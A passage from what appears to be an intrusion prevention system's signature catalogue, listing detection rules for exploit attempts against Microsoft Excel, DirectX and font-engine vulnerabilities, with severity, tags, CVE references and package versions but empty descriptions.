Context: HTTP Server Stream
Severity: 7
Tags: Windows XP, Windows 2000, Windows 2003, Any Hardware, DirectX, MS2009-07, CVE2009, Windows XP not specific, Windows 2000 not specific, Windows 2003 not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-224-3038
Last changed: sgpkg-ips-224-3038
Vulnerability: Microsoft-DirectShow-Remote-Code-Execution
Description:
Back to top

HTTP_SS-Microsoft-DirectX-Sami-File-Parsing-Code-Execution

About this situation: An attempt to exploit a vulnerability in Microsoft DirectX detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows 2000, Any Hardware, DirectX, MS2007-12, CVE2007, Windows 2000 not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-136-2032
Last changed: sgpkg-ips-194-2032
Vulnerability: Microsoft-DirectX-Sami-File-Parsing-Code-Execution
Description:
Back to top

HTTP_SS-Microsoft-DirectX-Sami-Format-Parsing-Code-Execution

About this situation: Attempt to exploit a vulnerability in Microsoft DirectX detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, DirectX, MS2008-06, CVE2008, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-161-2032
Last changed: sgpkg-ips-300-4219
Vulnerability: Microsoft-DirectX-Sami-Format-Parsing-Code-Execution
Description:
Back to top

HTTP_SS-Microsoft-DirectX-WAV-And-AVI-File-Parsing-Code-Execution

About this situation: An attempt to exploit a vulnerability in Microsoft DirectX detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows XP, Windows 2000, Windows 2003, Windows Vista, Any Hardware, MS2007-12, CVE2007, Windows XP not specific, Windows 2000 not specific, Windows 2003 not specific, Windows Vista not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-134-2032
Last changed: sgpkg-ips-167-2032
Vulnerability: Microsoft-DirectX-WAV-And-AVI-File-Parsing-Code-Execution
Description:
Back to top

HTTP_SS-Microsoft-Embedded-OpenType-Font-Engine-Heap-Overflow

About this situation: An attempt to exploit a vulnerability in Microsoft Embedded OpenType Font Engine detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows XP, Windows 2000, Windows 2003, Windows Vista, Windows 2008, Any Hardware, MS2009-07, CVE2009, Windows XP not specific, Windows 2000 not specific, Windows 2003 not specific, Windows Vista not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-231-3038
Last changed: sgpkg-ips-231-3038
Vulnerability: Microsoft-Embedded-OpenType-Font-Engine-Heap-Overflow
Description:
Back to top

HTTP_SS-Microsoft-Embedded-OpenType-Font-Engine-Integer-Overflow

About this situation: An attempt to exploit a vulnerability in Microsoft Embedded OpenType Font Engine detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows XP, Windows 2000, Windows 2003, Windows Vista, Windows 2008, Any Hardware, MS2009-07, CVE2009, Windows XP not specific, Windows 2000 not specific, Windows 2003 not specific, Windows Vista not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-231-3038
Last changed: sgpkg-ips-231-3038
Vulnerability: Microsoft-Embedded-OpenType-Font-Engine-Integer-Overflow
Description:
Back to top

HTTP_SS-Microsoft-Excel-Array-Indexing-Vulnerability-CVE-2011-0978

About this situation: An attempt to exploit Excel vulnerability CVE-2011-0978
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Excel, MS2011-04, CVE2011, Windows not specific, Microsoft Excel not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-387-4219
Last changed: sgpkg-ips-387-4219
Vulnerability: Microsoft-Excel-Array-Indexing-Vulnerability-CVE-2011-0978
Description:
Back to top

HTTP_SS-Microsoft-Excel-Array-Indexing-Vulnerability-CVE-2011-1990

About this situation: An attempt to exploit a vulnerability in Microsoft Excel detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Excel, MS2011-09, CVE2011, Windows not specific, Microsoft Excel not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-412-4219
Last changed: sgpkg-ips-412-4219
Vulnerability: Microsoft-Excel-Array-Indexing-Vulnerability-CVE-2011-1990
Description:
Back to top

HTTP_SS-Microsoft-Excel-Axisparent-Record-Index-Handling-Code-Execution

About this situation: An attempt to exploit a vulnerability in Microsoft Excel detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Mac OS X, Any Hardware, Microsoft Excel, Microsoft Excel Viewer, MS2008-08, CVE2008, Windows not specific, Microsoft Excel not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-251-3038
Last changed: sgpkg-ips-292-4219
Vulnerability: Microsoft-Excel-Axisparent-Record-Index-Handling-Code-Execution
Description:
Back to top

HTTP_SS-Microsoft-Excel-Buffer-Overrun-Vulnerability-CVE-2011-1276

About this situation: An attempt to exploit a vulnerability in Microsoft Excel detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Excel, MS2011-06, CVE2011, Windows not specific, Microsoft Excel not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-396-4219
Last changed: sgpkg-ips-396-4219
Vulnerability: Microsoft-Excel-Buffer-Overrun-Vulnerability-CVE-2011-1276
Description:
Back to top

HTTP_SS-Microsoft-Excel-Conditional-Expression-Parsing-Vulnerability

About this situation: An attempt to exploit a vulnerability in Microsoft Office detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Excel, MS2011-09, CVE2011, Windows not specific, Microsoft Excel not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-412-4219
Last changed: sgpkg-ips-412-4219
Vulnerability: Microsoft-Excel-Conditional-Expression-Parsing-Vulnerability
Description:
Back to top

HTTP_SS-Microsoft-Excel-Conditional-Formatting-Values-Handling-Code-Execution

About this situation: An attempt to exploit a vulnerability in Microsoft Excel detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Mac OS X, Any Hardware, Microsoft Excel, MS2008-03, CVE2008, Windows not specific, Microsoft Excel not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-251-3038
Last changed: sgpkg-ips-292-4219
Vulnerability: Microsoft-Excel-Conditional-Formatting-Values-Handling-Code-Execution
Description:
Back to top

HTTP_SS-Microsoft-Excel-Crafted-Picture-Record-Code-Execution

About this situation: An attempt to exploit a vulnerability in Microsoft Excel detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Mac OS X, Any Hardware, Microsoft Excel, Microsoft Excel Viewer, MS2009-04, CVE2009, Windows not specific, Microsoft Excel not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-251-3038
Last changed: sgpkg-ips-292-4219
Vulnerability: Microsoft-Excel-Crafted-Picture-Record-Code-Execution
Description:
Back to top

HTTP_SS-Microsoft-Excel-Dangling-Pointer-Vulnerability-CVE-2011-0980

About this situation: An attempt to exploit Excel vulnerability CVE-2011-0980
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Excel, MS2011-04, CVE2011, Windows not specific, Microsoft Excel not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-387-4219
Last changed: sgpkg-ips-387-4219
Vulnerability: Microsoft-Excel-Dangling-Pointer-Vulnerability-CVE-2011-0980
Description:
Back to top

HTTP_SS-Microsoft-Excel-Data-Initialization-Vulnerability-CVE-2011-0105

About this situation: An attempt to exploit Excel vulnerability CVE-2011-0105
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Excel, MS2011-04, CVE2011, Windows not specific, Microsoft Excel not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-387-4219
Last changed: sgpkg-ips-387-4219
Vulnerability: Microsoft-Excel-Data-Initialization-Vulnerability-CVE-2011-0105
Description:
Back to top

HTTP_SS-Microsoft-Excel-Data-Validation-Record-Processing-Code-Execution

About this situation: An attempt to exploit a code execution vulnerability in Microsoft Excel detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Excel, MS2008-03, CVE2008, Windows not specific, Microsoft Excel not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-149-2032
Last changed: sgpkg-ips-292-4219
Vulnerability: HTTP-Microsoft-Excel-Data-Validation-Record-Processing-Code-Execution
Description:
Back to top

HTTP_SS-Microsoft-Excel-DbOrParamQry-Record-Parsing-CVE-2010-0264

About this situation: An attempt to exploit a vulnerability in Microsoft Excel detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Excel 2002, Microsoft Excel 2004 for Mac, Microsoft Excel 2008 for Mac, MS2010-03, CVE2010, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-292-4219
Last changed: sgpkg-ips-292-4219
Vulnerability: Microsoft-Excel-DbOrParamQry-Record-Parsing-CVE-2010-0264
Description:
Back to top

HTTP_SS-Microsoft-Excel-ExternName-Record-Parsing-Buffer-Overflow-CVE-2010-1249

About this situation: A malicious Microsoft Excel document targeting CVE-2010-1249 over HTTP detected
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Microsoft Office, MS2010-06, CVE2010, Any Operating System not specific, Microsoft Office not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-320-4219
Last changed: sgpkg-ips-320-4219
Vulnerability: Microsoft-Excel-ExternName-Record-Parsing-Buffer-Overflow-CVE-2010-1249
Description:
Back to top

HTTP_SS-Microsoft-Excel-File-Handling-Code-Execution-Vulnerability

About this situation: Detected an attempt to exploit memory corruption vulnerability in Microsoft Excel
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Microsoft Excel, Microsoft Excel Viewer, MS2008-03, CVE2008, Any Operating System not specific, Microsoft Excel not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-141-2032
Last changed: sgpkg-ips-402-4219
Vulnerability: Microsoft-Excel-File-Handling-Code-Execution-Vulnerability
Description:
Back to top

HTTP_SS-Microsoft-Excel-File-Importing-Code-Execution

About this situation: Malicious Microsoft Excel SYLK document download from HTTP server detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Excel, MS2008-03, CVE2008, Windows not specific, Microsoft Excel not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-173-2032
Last changed: sgpkg-ips-342-4219
Vulnerability: Microsoft-Excel-File-Importing-Code-Execution
Description:
Back to top

HTTP_SS-Microsoft-Excel-FNGROUPNAME-Record-Uninitialized-Memory-CVE-2010-0262

About this situation: An attempt to exploit a vulnerability in Microsoft Excel detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Excel 2007, Microsoft Excel 2004 for Mac, MS2010-03, CVE2010, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-292-4219
Last changed: sgpkg-ips-292-4219
Vulnerability: Microsoft-Excel-FNGROUPNAME-Record-Uninitialized-Memory-CVE-2010-0262
Description:
Back to top

HTTP_SS-Microsoft-Excel-Frtwrapper-Record-Buffer-Overflow

About this situation: An attempt to exploit a buffer overflow vulnerability in Microsoft Excel detected
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Microsoft Excel, Microsoft Excel Viewer, MS2008-10, CVE2008, Any Operating System not specific, Microsoft Excel not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-176-2032
Last changed: sgpkg-ips-292-4219
Vulnerability: Microsoft-Excel-Frtwrapper-Record-Buffer-Overflow
Description:
Back to top

HTTP_SS-Microsoft-Excel-Graphic-Object-Deref-Vulnerability-CVE-2011-0977

About this situation: An attempt to exploit Microsoft Excel vulnerability CVE-2011-0977
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Excel, MS2011-04, CVE2011, Windows not specific, Microsoft Excel not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-388-4219
Last changed: sgpkg-ips-402-4219
Vulnerability: Microsoft-Excel-Graphic-Object-Deref-Vulnerability-CVE-2011-0977
Description:
Back to top

HTTP_SS-Microsoft-Excel-Heap-Corruption-Vulnerability

About this situation: An attempt to exploit a vulnerability in Microsoft Excel detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Excel, MS2011-09, CVE2011, Windows not specific, Microsoft Excel not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-412-4219
Last changed: sgpkg-ips-414-4219
Vulnerability: Microsoft-Excel-Heap-Corruption-Vulnerability
Description:
Back to top

HTTP_SS-Microsoft-Excel-Heap-Overflow-Vulnerability-CVE-2011-0098

About this situation: An attempt to exploit Excel vulnerability CVE-2011-0098
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Excel, MS2011-04, CVE2011, Windows not specific, Microsoft Excel not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-386-4219
Last changed: sgpkg-ips-388-4219
Vulnerability: Microsoft-Excel-Heap-Overflow-Vulnerability-CVE-2011-0098
Description:
Back to top

HTTP_SS-Microsoft-Excel-Improper-Record-Parsing-Vulnerability-CVE-2011-1273

About this situation: An attempt to exploit a vulnerability in Microsoft Excel detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Excel, MS2011-06, CVE2011, Windows not specific, Microsoft Excel not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-396-4219
Last changed: sgpkg-ips-396-4219
Vulnerability: Microsoft-Excel-Improper-Record-Parsing-Vulnerability-CVE-2011-1273
Description:
Back to top

HTTP_SS-Microsoft-Excel-Integer-Overrun-Vulnerability-CVE-2011-0097

About this situation: An attempt to exploit Excel vulnerability CVE-2011-0097
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Excel, MS2011-04, CVE2011, Windows not specific, Microsoft Excel not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-387-4219
Last changed: sgpkg-ips-387-4219
Vulnerability: Microsoft-Excel-Integer-Overrun-Vulnerability-CVE-2011-0097
Description:
Back to top

HTTP_SS-Microsoft-Excel-Linked-List-Corruption-Vulnerability-CVE-2011-0979

About this situation: An attempt to exploit Excel vulnerability CVE-2011-0979
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Excel, MS2011-04, CVE2011, Windows not specific, Microsoft Excel not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-387-4219
Last changed: sgpkg-ips-387-4219
Vulnerability: Microsoft-Excel-Linked-List-Corruption-Vulnerability-CVE-2011-0979
Description:
Back to top

HTTP_SS-Microsoft-Excel-Malformed-Formula-Parsing-Code-Execution

About this situation: An attempt to exploit a vulnerability in Microsoft Excel detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Excel, Microsoft Excel Viewer, Microsoft Office, Microsoft Office Compatibility Pack, MS2008-03, CVE2008, Windows not specific, Microsoft Excel not specific, Microsoft Office not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-385-4219
Last changed: sgpkg-ips-385-4219
Vulnerability: Microsoft-Excel-Malformed-Formula-Parsing-Code-Execution
Description:
Back to top

HTTP_SS-Microsoft-Excel-Malformed-Record-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Microsoft Office detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Excel, MS2009-06, CVE2009, Windows not specific, Microsoft Excel not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-402-4219
Last changed: sgpkg-ips-402-4219
Vulnerability: Microsoft-Office-Excel-Malformed-Record-Memory-Corruption
Description:
Back to top

HTTP_SS-Microsoft-Excel-MDXSET-Record-Heap-Overflow-CVE-2010-0261

About this situation: An attempt to exploit a vulnerability in Microsoft Excel detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Excel 2007, MS2010-03, CVE2010, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-292-4219
Last changed: sgpkg-ips-292-4219
Vulnerability: Microsoft-Excel-MDXSET-Record-Heap-Overflow-CVE-2010-0261
Description:
Back to top

HTTP_SS-Microsoft-Excel-MDXTUPLE-Record-Heap-Overflow-CVE-2010-0260

About this situation: An attempt to exploit a vulnerability in Microsoft Excel detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Excel Viewer, Microsoft Excel 2007, MS2010-03, CVE2010, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-292-4219
Last changed: sgpkg-ips-296-4219
Vulnerability: Microsoft-Excel-MDXTUPLE-Record-Heap-Overflow-CVE-2010-0260
Description:
Back to top

HTTP_SS-Microsoft-Excel-Memory-Heap-Overwrite-Vulnerability-CVE-2011-1275

About this situation: An attempt to exploit a vulnerability in Microsoft Excel detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Excel, MS2011-06, CVE2011, Windows not specific, Microsoft Excel not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-396-4219
Last changed: sgpkg-ips-396-4219
Vulnerability: Microsoft-Excel-Memory-Heap-Overwrite-Vulnerability-CVE-2011-1275
Description:
Back to top

HTTP_SS-Microsoft-Excel-Merge-Cell-Record-Pointer-CVE-2010-3237

About this situation: Detected attempt to exploit a vulnerability in Microsoft Excel
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Excel 2002, Microsoft Excel 2004 for Mac, MS2010-10, CVE2010, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-348-4219
Last changed: sgpkg-ips-348-4219
Vulnerability: Microsoft-Excel-Merge-Cell-Record-Pointer-CVE-2010-3237
Description:
Back to top

HTTP_SS-Microsoft-Excel-Name-Record-Array-Indexing-Stack-Corruption

About this situation: An attempt to exploit a vulnerability in Microsoft Excel detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Excel, Microsoft Excel Viewer, Microsoft Office, Microsoft Open XML File Format Converter, MS2008-12, CVE2008, Windows not specific, Microsoft Excel not specific, Microsoft Office not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-405-4219
Last changed: sgpkg-ips-405-4219
Vulnerability: Microsoft-Excel-Name-Record-Array-Indexing-Stack-Corruption
Description:
Back to top

HTTP_SS-Microsoft-Excel-Out-Of-Bounds-Array-Access-Vulnerability-CVE-2011-1274

About this situation: An attempt to exploit a vulnerability in Microsoft Excel detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Excel, MS2011-06, CVE2011, Windows not specific, Microsoft Excel not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-396-4219
Last changed: sgpkg-ips-396-4219
Vulnerability: Microsoft-Excel-Out-Of-Bounds-Array-Access-Vulnerability-CVE-2011-1274
Description:
Back to top

HTTP_SS-Microsoft-Excel-Out-Of-Bounds-Array-Indexing-Vulnerability

About this situation: An attempt to exploit a vulnerability in Microsoft Office detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Excel, MS2011-09, CVE2011, Windows not specific, Microsoft Excel not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-412-4219
Last changed: sgpkg-ips-412-4219
Vulnerability: Microsoft-Excel-Out-Of-Bounds-Array-Indexing-Vulnerability
Description:
Back to top

HTTP_SS-Microsoft-Excel-Ptgextraarray-Parsing-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Microsoft Excel detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Excel, Microsoft Office, MS2010-10, CVE2010, Windows not specific, Microsoft Excel not specific, Microsoft Office not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-401-4219
Last changed: sgpkg-ips-401-4219
Vulnerability: Microsoft-Excel-Ptgextraarray-Parsing-Memory-Corruption
Description:
Back to top

HTTP_SS-Microsoft-Excel-Real-Time-Data-Array-Record-CVE-2010-3240

About this situation: Detected attempt to exploit a vulnerability in Microsoft Excel
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Excel Viewer, Microsoft Excel 2002, Microsoft Excel 2007, MS2010-10, CVE2010, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-348-4219
Last changed: sgpkg-ips-348-4219
Vulnerability: Microsoft-Excel-Real-Time-Data-Array-Record-CVE-2010-3240
Description:
Back to top

HTTP_SS-Microsoft-Excel-Record-Memory-Corruption-CVE-2010-0257

About this situation: An attempt to exploit a vulnerability in Microsoft Excel detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Excel 2002, MS2010-03, CVE2010, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-292-4219
Last changed: sgpkg-ips-292-4219
Vulnerability: Microsoft-Excel-Record-Memory-Corruption-CVE-2010-0257
Description:
Back to top

HTTP_SS-Microsoft-Excel-Record-Parsing-Integer-Overflow-CVE-2010-3230

About this situation: Detected attempt to exploit a vulnerability in Microsoft Excel
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Excel 2002, MS2010-10, CVE2010, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-347-4219
Last changed: sgpkg-ips-347-4219
Vulnerability: Microsoft-Excel-Record-Parsing-Integer-Overflow-CVE-2010-3230
Description:
Back to top

HTTP_SS-Microsoft-Excel-Record-Parsing-WriteAV-Vulnerability-CVE-2011-0101

About this situation: An attempt to exploit Excel vulnerability CVE-2011-0101
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Excel, MS2011-04, CVE2011, Windows not specific, Microsoft Excel not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-386-4219
Last changed: sgpkg-ips-388-4219
Vulnerability: Microsoft-Excel-Record-Parsing-WriteAV-Vulnerability-CVE-2011-0101
Description:
Back to top

HTTP_SS-Microsoft-Excel-Rept-Function-Integer-Overflow

About this situation: An attempt to exploit a vulnerability in Microsoft Excel detected
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Microsoft Excel, Microsoft Excel Viewer, Microsoft Office SharePoint Server, Microsoft Office, Microsoft Open XML File Format Converter, Microsoft Office Compatibility Pack, Microsoft Office System, MS2008-10, CVE2008, Any Operating System not specific, Microsoft Excel not specific, Microsoft Office SharePoint Server not specific, Microsoft Office not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-383-4219
Last changed: sgpkg-ips-383-4219
Vulnerability: Microsoft-Excel-Rept-Function-Integer-Overflow
Description:
Back to top

HTTP_SS-Microsoft-Excel-Style-Record-Data-Handling-Code-Execution

About this situation: An attempt to exploit a vulnerability in Microsoft Excel detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Excel, Microsoft Excel Viewer, Microsoft Office, MS2008-03, CVE2008, Windows not specific, Microsoft Excel not specific, Microsoft Office not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-385-4219
Last changed: sgpkg-ips-385-4219
Vulnerability: Microsoft-Excel-Style-Record-Data-Handling-Code-Execution
Description:
Back to top

HTTP_SS-Microsoft-Excel-SxView-Record-Parsing-Memory-Corruption-CVE-2010-0821

About this situation: A malicious Microsoft Excel document targeting CVE-2010-0821 over HTTP detected
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Microsoft Office, MS2010-06, CVE2010, Any Operating System not specific, Microsoft Office not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-320-4219
Last changed: sgpkg-ips-320-4219
Vulnerability: Microsoft-Excel-SxView-Record-Parsing-Memory-Corruption-CVE-2010-0821
Description:
Back to top

HTTP_SS-Microsoft-Excel-Use-After-Free-WriteAV-Vulnerability

About this situation: An attempt to exploit a vulnerability in Microsoft Excel detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Excel, MS2011-09, CVE2011, Windows not specific, Microsoft Excel not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-412-4219
Last changed: sgpkg-ips-412-4219
Vulnerability: Microsoft-Excel-Use-After-Free-WriteAV-Vulnerability
Description:
Back to top

HTTP_SS-Microsoft-Excel-WriteAV-Vulnerability-CVE-2011-1278

About this situation: An attempt to exploit a vulnerability in Microsoft Excel detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Excel, MS2011-06, CVE2011, Windows not specific, Microsoft Excel not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-396-4219
Last changed: sgpkg-ips-397-4219
Vulnerability: Microsoft-Excel-WriteAV-Vulnerability-CVE-2011-1278
Description:
Back to top

HTTP_SS-Microsoft-Exchange-Outlook-Web-Access-CSRF-CVE-2010-3213

About this situation: A malicious HTML document targeting CVE-2010-3213 detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Exchange Server, CVE2010, Windows not specific, Exchange Server not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-338-4219
Last changed: sgpkg-ips-338-4219
